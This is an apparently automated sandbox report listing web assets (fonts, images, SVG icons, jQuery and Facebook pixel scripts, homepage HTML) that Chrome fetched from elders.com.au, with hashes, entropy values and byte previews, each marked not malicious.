                                                                                                                                    SHA-512:52CEAF58864239C90439610D8C3B75F1BAAE5F9F8220C41A781037084E058C85B7E2AC552D117107397EE7FD23199D6B3D4C3EDA9F26CFB50D7C38E1EF55A654
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.........................................................................X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:TrueType Font data, 15 tables, 1st "FFTM", 44 names, Macintosh
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):227504
                                                                                                                                    Entropy (8bit):5.504571788876336
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:Zd4qrHE8TJS+JdQ0J9uSqC5ahr0BDxFTRK:RrHE8TJScdluiahr0blRK
                                                                                                                                    MD5:F551DE70C45E8C68EC16E39B1F1E815C
                                                                                                                                    SHA1:9FB8BC8ADE21175339CA59952BC29119B67F690C
                                                                                                                                    SHA-256:B1CDC3004982532C72FE0C87DB552DA5B8D4A254ABAAB45F54473FE7B82B39D0
                                                                                                                                    SHA-512:E75C30176A7E7FFEB20B911C852C37108D1874DF919DE0F1205BCB623E3488381E70C0B40EAAE6ACE5E3F8BD648C5B70B104FD99816FBA431ADE2CA26700E18D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Normal.a1cecbde.ttf
                                                                                                                                    Preview:...........pFFTM..J...x.....GDEF*.....6....fGPOS..@...X.....GSUB..."..7\..!.OS/2..p*...x...`cmap...3........gasp......6.....glyf......#4...lhead.aP........6hhea.6.....4...$hmtx.e..........loca._.........jmaxp.......X... name.6nR..... .post.I0k......,H............_.<...................d].....Q.N...........................o.Q...........................................@...................i.......i.....;..................P. {........MONO..............." .............. ...,.L.....M...........$.U..._.6.#.C.7.Z.-...A..._.E._.E.....-...7.".A.-.7...K...A.B.A...7.(.A...-.!.-...<.?.A...#.B.A.=.7.0.U.@.U.G...x.7.H.-...-...A.G...a._.=.A.y._..._..._...B..._..._.....,._..._.&.F..._...A.$._...A.,._.C.7.....{.Z.A...6...".........-..._.........|.A.....h.7...<.<.P...A.;.A...A././...2.7.R...L.......R...S.,.M.,.L.%.<.9.T.9.A.D.N...7.@...-.Z...................-.K.-..._.K...N.A.....$.U...A.3.7...:......._.$.A...7.j.A...7...A...7.-.7.j.A.D.....-...7.f.-.k.-.h.7...Z.Y.#.-.U.".7.E.-...7...7...-...-...-...7.G..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 24.7 (Macintosh), datetime=2023:09:12 16:44:35], baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):208388
                                                                                                                                    Entropy (8bit):7.949620149943259
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:GSQ29uiOQLDcFAqKIYZXl4+Pd0xKVJ5r7DMPOtspq:3Q2+LFzYXKEVbr74Pfpq
                                                                                                                                    MD5:F29CB4419F9D804A731B08D789232CBE
                                                                                                                                    SHA1:12A04FCC080A075A93604F4256B33C46E55539D5
                                                                                                                                    SHA-256:2D490C86E527EB7643820D47BC48841648642568A2A278A10C4CAEE98D2430B0
                                                                                                                                    SHA-512:47F2A4B7C3715EC8F9DC80F2D1EA642F6434F4E41BDB5ACD4745A708DDBE079CD8B498E4FDE62CDED63D0BBAC84A22A93227F8D4141792124524B56264CD64C5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/images/homepage-banners/two_staff_members_with_client_by_ute.jpg
                                                                                                                                    Preview:.....nExif..MM.*.............................b...........j.(...........1.....!...r.2...........i....................'.......'.Adobe Photoshop 24.7 (Macintosh).2023:09:12 16:44:35...........................X..........................................."...........*.(.....................2...........4.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................k...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I.#".j.}..:..lk...EU5....V...(..ci....4..S..o...*.cc..{/.J..7s...>........}X...#..6\.eT......3....:.=....\wJ.g...#'2.)
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3772
                                                                                                                                    Entropy (8bit):3.834088123858926
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:x0h5r8869TkYp9e9oCvMA5lu/uNiPF/r7I1Ga0pFby:x0npGJkZ5A/uIxrsF0pFby
                                                                                                                                    MD5:68D8392693D2E3F169888BD1BE9621D9
                                                                                                                                    SHA1:90952E7C090EF318567B562D22A5FB8B26388321
                                                                                                                                    SHA-256:5285194B6175B6C2FD8A83876A24FBB20611FF80899323CBDF4A9DD4DE1F60CA
                                                                                                                                    SHA-512:2EC9AF1D78034D45CBC15303CC830E34690141EFADF9D30D5D0C1F7786032EA074CACAC14B023317E9508EE8DBC0C3F7F205E8CE8AE6E64E29F3856D174C6A4B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/el-logo-2.svg
                                                                                                                                    Preview:<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.737 8.99691C65.9247 9.10241 65.049 9.44001 64.2367 10.0413C63.7197 9.45056 63.5298 9.27121 63.0023 9.09186C61.9052 8.73316 60.6814 9.37671 59.964 10.1996L55.6702 14.6622C55.5014 14.831 55.3432 14.9892 55.1744 15.1475L55.1427 15.1686C53.2754 16.9409 51.5874 18.1542 49.1504 18.4601C46.0065 18.861 44.8672 16.5506 48.5807 13.2063C50.4269 11.55 51.7246 11.4023 52.2837 11.7082C53.1488 12.1724 52.9167 13.4806 48.9077 15.2846C48.4858 15.4745 47.9161 15.7277 48.1271 16.7405C48.2009 17.0992 48.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677 42.0714 1
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (553)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3681
                                                                                                                                    Entropy (8bit):5.310615162639586
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:IGUXERTgdf3nfLzeJpMJvAdFADGKCnt0gzCH9Uum33Es3PBH0Or/1mSh/F4ksiiN:BDzFHXz4M3r9LjqziiN
                                                                                                                                    MD5:011C0FC0D0CF131BDFF879743A353002
                                                                                                                                    SHA1:9336BA4F6BD99531147F284CF217D473EB6FA3C0
                                                                                                                                    SHA-256:2DBB30AF18C1CC025D432F934A8B23478A3539D525BFA6100FB097E2DCDAFE57
                                                                                                                                    SHA-512:0681C12F9DA2507D19D32CE68C2B4A6ACA9F56A8F9BCC5CF3840B1757FD15DE1EF1411069913D566D39933DA586401585DA7481F0762795CF0E4DD64A2410E00
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js
                                                                                                                                    Preview:(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.externalize&&(c.url=k.externalize(c.url)),c.encodePath&&(c.url=k.encodePathOfURI(c.url)));c.hook&&(h=k.getXhrHook(c.url,c.type,c.data))&&(c.url=h.url,h.params&&("GET"===c.type.toUpperCase()?c.url+="?"+g.param(h.params):c.data=g.param(h.params)))},statusCode:{403:function(h){"Authentication Failed"===.h.getResponseHeader("X-Reason")&&k.handleLoginRedirect()}}});g.ajaxSettings.traditional=!0})(jQuery,this);.(function(g){window.Granite.csrf||(window.Granite.csrf=g(window.Granite.HTTP))})(function(g){function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.con
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):772
                                                                                                                                    Entropy (8bit):4.3966498802641985
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:twdoqAulEVIO4Rh6cPWgm0R/4XcYRVdL56I7sF0S:6mqaVIOy86IAiS
                                                                                                                                    MD5:198206BDD32C90F5DE0D10D91FD81833
                                                                                                                                    SHA1:B611164EF07C0F87EE85823EC554D32540B39C08
                                                                                                                                    SHA-256:A9674747820E8FE27D55C02996B53ABEBEC5059D5D3B1EFECC6206C46C80E87B
                                                                                                                                    SHA-512:48F5AB95C937ACF7ABBE9DA03EF2E582A037A919A1AE88C7387F84C0DECD629273A0E06039F0B1CE978F021619027CAF093E796E88F4906F109BA59244C92D30
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.0468 7.62878 13.8806 6.77789 13.5539 5.98388C13.2271 5.18987 12.7463 4.46846 12.1392 3.86133C11.532 3.25419 10.8106 2.77336 10.0166 2.4466C9.2226 2.11985 8.37171 1.95364 7.5131 1.95759C6.65449 1.96153 5.80517 2.13555 5.0142 2.46959C4.22322 2.80363 3.50626 3.29107 2.90473 3.90376C1.70425 5.12651 1.03516 6.77384 1.04304 8.48739C1.05091 10.2009 1.73511 11.842 2.94677 13.0537C4.15844 14.2654 5.79956 14.9496 7.5131 14.9575C9.22664 14.9653 10.874 14.2962 12.0967 13.0958V13.0958Z" stroke="#3D3E42" stroke-width="2"/>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):443
                                                                                                                                    Entropy (8bit):7.296855487645181
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/7ex9HQKeLniSTObPCwfvyQ+gU7rXlYhjueptQvs:PyybZS7dzlZeptQvs
                                                                                                                                    MD5:EA595ABD27296CACE135E3D050D49111
                                                                                                                                    SHA1:D9E988853C54439C6FE847FD2800579D3D14B960
                                                                                                                                    SHA-256:3D0277BB0C2F476E621893EC5125B053A353D62A8434491CCCE82D418E846CF3
                                                                                                                                    SHA-512:D4518B9CCF8B258B44347591FE677A72906653F5180FB3DD3FAF96A0D2FCC75E83E3DA03573C3652424B477B4685A8F953C228674C2626254053387703909010
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR.............;0......pHYs...........~....mIDATH...M.0....{..{.1.t....@.[.@.P...t.(.\6.,...4+E.y.=...IQ....3c.j.Gx...f...<.)...-...V.....{......;.....k....of..4..:...)..kV....`330./.4...6.I..fw...K.&k....P...m..W..T.p.5zw...^..^(5.Wf.JE......C0R.f3..o.u..U.2W.....3a.(....\p...w.<\.r.^M03.:..)..sq.........#..V.$G...K.....51S..t.....m.uV.......H.bN...Z....1..".t.>....[N$9G]......;..ui...T|q.....R.0>?.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):137787
                                                                                                                                    Entropy (8bit):7.979539421935738
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:RkWKWJvD0r3NbIN/HiQe4gOW5qFEwKwoZmxLfENvk:RkQ4DYPiQe4PW5SEzHNvk
                                                                                                                                    MD5:1449892EFC0C94786478F6609C28125D
                                                                                                                                    SHA1:543F955354ACC99ACE29D1A25F66FC27236B4282
                                                                                                                                    SHA-256:E13BC940E002D0452E884BA843690457B75D2CC0F9FEFD66F99F0E7093A528D7
                                                                                                                                    SHA-512:452E7E2C619377774BD603437DCA84B58EC80B1A2B2978AA3169A996E9749B537E7038A0BADAF728D53D61612D5B285189A253E37002462CBD87F27153BBFCDD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:D3DA53FA53BD11EFB156A9DD8535B747" xmpMM:InstanceID="xmp.iid:D3DA53F953BD11EFB156A9DD8535B747" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69d761ac-ac6e-4ecd-ae24-eb8e472e5d5c" stRef:documentID="adobe:docid:photoshop:6ec06c4c-7df8-ea4c-828b-fc5ea02d2e14"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 600 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):292817
                                                                                                                                    Entropy (8bit):7.991435801139438
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:6144:7pKYu/kHxtd4lfDFI5srU+JBM7kEEgmXTdr6:Oaxj4/QfEg2+
                                                                                                                                    MD5:9A5F5905DB03C7F0FEDA9C9651464F24
                                                                                                                                    SHA1:EFB3B37FF24DE6CC134E203D4BBA44DDED701E6D
                                                                                                                                    SHA-256:F5C133FE3DD199E54EAEF091900E0471B0C940DC70434235E45D2CF2A4DE9094
                                                                                                                                    SHA-512:CA37B79B64F1DC3A03DED9DE406AF15604A3B95A8A58C3755F3EA2FF5CEEFD833D888D1A37FD75E5393921C459CED026D8B8ADBE55DE6B0DF5DCE669E612DDB8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR...X.........r5......pHYs..........+....."iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Copy of ELD2024_livestockNow_landingpage-images-template.psd - 11</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-09-02</Attrib:Created>. <Attrib:ExtId>c6b7f448-340c-4f65-b35f-83bbe5a978b7</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (9217)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):244295
                                                                                                                                    Entropy (8bit):5.4541896576203746
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713FQ:pfLeYc+PJxH8NNfFcrHurPK713K
                                                                                                                                    MD5:4A8563B91911943558554AA6B3016781
                                                                                                                                    SHA1:C2C06261B27F1C03EFEC1AD087FED94FBE5050C1
                                                                                                                                    SHA-256:924F0B32E86FE959E4290F3690D241CC6A24C08A0A4BE56B4D3CE9C2286291BC
                                                                                                                                    SHA-512:0D78AB98DDDB0F7CDB6A7CE20DD24425D1BFC2BC586091B368B45EA7020EB30FD059D28DB9D8DBBDA97439C37292304AE1BB8C1B3A2A51DDAB2D56AED3C09579
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 32 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):817
                                                                                                                                    Entropy (8bit):7.602031146587345
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:N/61fBUkouE4pvW0D0g6WS3Qv3YMhoyD8x7RQS:N/6FBKgec0g63kNW
                                                                                                                                    MD5:CE273BDD7D5C78613311F31B1BC77870
                                                                                                                                    SHA1:CCAD030EC9060D5EB3CBACB77968A9ACAD13C5C9
                                                                                                                                    SHA-256:0D220766B429A80F4858F1A115F79D746D7A3D873FFBE11233E4A822C5759982
                                                                                                                                    SHA-512:011B8ABA918ED0807D82A7B98177E2F1190A2426339B5458A68DDB1E6A424CA16BABB1D22204C670FBEC7C9F1FA064AD37A8CFDB80C370FA3AC01CA13334E831
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR... ................pHYs.................sRGB.........gAMA......a.....IDATx..VKR.@....B.O.*.&..N.>A..!'.. .....'.....,..!$U.|6...t[Ra.d.`'...x..o..g......`..'...... No...c.$.D..=S.vk..|3%....BH^.....=."......r..M..r9.-.!..#{..mB8....+..\..M8.|.x...1$$S|.e...E{.@w........DL..f..`7....Yw.._.<........Z.h.3..-... ...s.Q..v....... ..:.-}...3f.V`..n.wD. .0.P.....C.=4..tC#..Q.....n..Z$).wQ.|}........$l...e...#^]..C.-p....G....6K..m)......E%....c..{..t.m.\...=m.H:sc;)%.Y.0.wBd.....x..z.....".\/}.]p.5u ..BhH.(..2...@;....jt_.aw!.!.aX....T>.-.tk.}.q.5.o......V..|....[h.B....!...Aj...7'......p...iw/.+...R.g86.D6TD.U....F?.:2..H.U" ...P.]X..s....8..P...L.pb...2..P...uGOtu'.r7du.2.V.2.L..D... ..Pa2...6A.Z.`..@..}....CT.JS.\Tx..z.....\..Tr.....>.xP...ANi._.'....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):172833
                                                                                                                                    Entropy (8bit):7.97941391640036
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:a+NHthlh12DD+/mmNTIbIhZjNf00ex5+zFwvTn7Q+SfjcwkUm6Ffdcykv:nNHtnh12DDsmpM/FwbuWw9jVkUm6Ufv
                                                                                                                                    MD5:BE3E5050811DEE216A7A83BED23ADA95
                                                                                                                                    SHA1:719F99304500468A81FDE12CFB628D6B8B44D974
                                                                                                                                    SHA-256:9EAF65CC1B0686F3C964D07DE135E84A7AAF1A46F0EBEDB4000F5A28722D54AA
                                                                                                                                    SHA-512:BB23963B3FB38F3A976D7324785BF957CA6BE322B4070B047E40B6FA612219A8D34F3100B67BCD505E8D87260E2BBBDE5F9BC41EDD1307FC747C8E84F5EF1780
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:B60FE747488D11EEA83687A2E59320CC" xmpMM:InstanceID="xmp.iid:B60FE746488D11EEA83687A2E59320CC" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:10052fcd-6563-4e0b-8b24-de1c12001c08" stRef:documentID="adobe:docid:photoshop:1b873438-bb99-024a-8e97-98777a8fb36f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1038)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):252418
                                                                                                                                    Entropy (8bit):4.48014142535743
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:OFF46NUR/aipg5faOj8kbNPWlHy2TKd0gQEEIigqyiHpE/EPZ46cdfezQT+7slXm:KUR/aiV+Y/2iek0iB5cgPcPDJdO
                                                                                                                                    MD5:9DA6BCB1776EA27D964A2AAD9498F277
                                                                                                                                    SHA1:1B89020B61F1ED5E86D06EEE76A93F3F19925299
                                                                                                                                    SHA-256:951493F4D9EFDDF1C017F00C5961A7915D02D6559D2542BC263F0F452803DC7A
                                                                                                                                    SHA-512:7E10D375D0B80E851A3DB50FB0B78DB5E29B3FD202B9717335D7932AD2596A17DBB9B16E71BBF09E95F1090453C6D12F7E3AC7D51541C787E9B9CE6A3F2801CC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/
                                                                                                                                    Preview:<!DOCTYPE HTML>.<html lang="en">.<head>. <meta charset="UTF-8"/>. <title>Home</title>. . . <meta name="template" content="elders---home-page"/>. <meta name="viewport" content="width=device-width, initial-scale=1"/>. . . Facebook -->. <meta property="og:title" content="Home"/>. <meta property="og:type" content=""/>. <meta property="og:description"/>. <meta property="og:url" content="https://elders.com.au/"/>. <meta property="og:site_name" content="Elders"/>. <meta property="og:image" content="https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.png"/>.. Twitter -->. <meta name="twitter:title" content="Home"/>. <meta name="twitter:description"/>. <meta name="twitter:url" content="https://elders.com.au/"/>. <meta name="twitter:image" content="https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.png"/>.. Apple Number Click
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):211
                                                                                                                                    Entropy (8bit):4.969901501689543
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:tIsqDmJS4RKb5nJEWvoXSK7AASKcvXjXRHgAEvlQVA8cXbLErFWFAmYHZAAbBWah:tI9mc4slnJ/wXDcA4noZcR3mqZllWq4I
                                                                                                                                    MD5:E4765EF64FAAF1BFA94BC2D68A3B16E2
                                                                                                                                    SHA1:70EA0BEA959B765AF8A9874170CF71AEE903EDA0
                                                                                                                                    SHA-256:493A230BCE655674730B4F4AFD752658F24C0FE643001DAD61C1EE99D070E9C3
                                                                                                                                    SHA-512:355BD63D4BF814925B951DBFA950079378FAFBB7C95F4BABE46E0588272D866A91B74706C224672B26E32ACC638893C883C8611A5FC183E56575F17E15B65EC9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">. <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" />.</svg>
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65472)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):151775
                                                                                                                                    Entropy (8bit):5.310612558975077
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:7RwVezu8jPgro1A29AaiWqSrdNgKTPhB/B1pLD:7RwsuuPgroSEBiNSR7B/R
                                                                                                                                    MD5:46A2DF1A9BFAEEFFBD5B53738ED986E6
                                                                                                                                    SHA1:D60EA1E3103A34CD5AB43950A9559F2DE478F769
                                                                                                                                    SHA-256:90A2617361565EFD206F9AAD7188BB03F52B7CE94143CA44E51C5F85C861D384
                                                                                                                                    SHA-512:52F105577E6A6D7128A270B81C6520DF57A181C36938DEA5BCBF4A93D6CFF832BBFD468C9D9A9847271ACA4AB4FD2ACF6D779B05C90F10342176B9EF33A3AC2D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*! For license information please see site.js.LICENSE.txt */.!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return n(e)}:n(t)}("undefined"!=typeof window?window:this,(function(r,o){"use strict";var i=[],a=Object.getPrototypeOf,s=i.slice,l=i.flat?function(e){return i.flat.call(e)}:function(e){return i.concat.apply([],e)},c=i.push,u=i.indexOf,d={},p=d.toString,f=d.hasOwnProperty,h=f.toString,m=h.call(Object),g={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},b=r.document,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e){return nu
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):67020
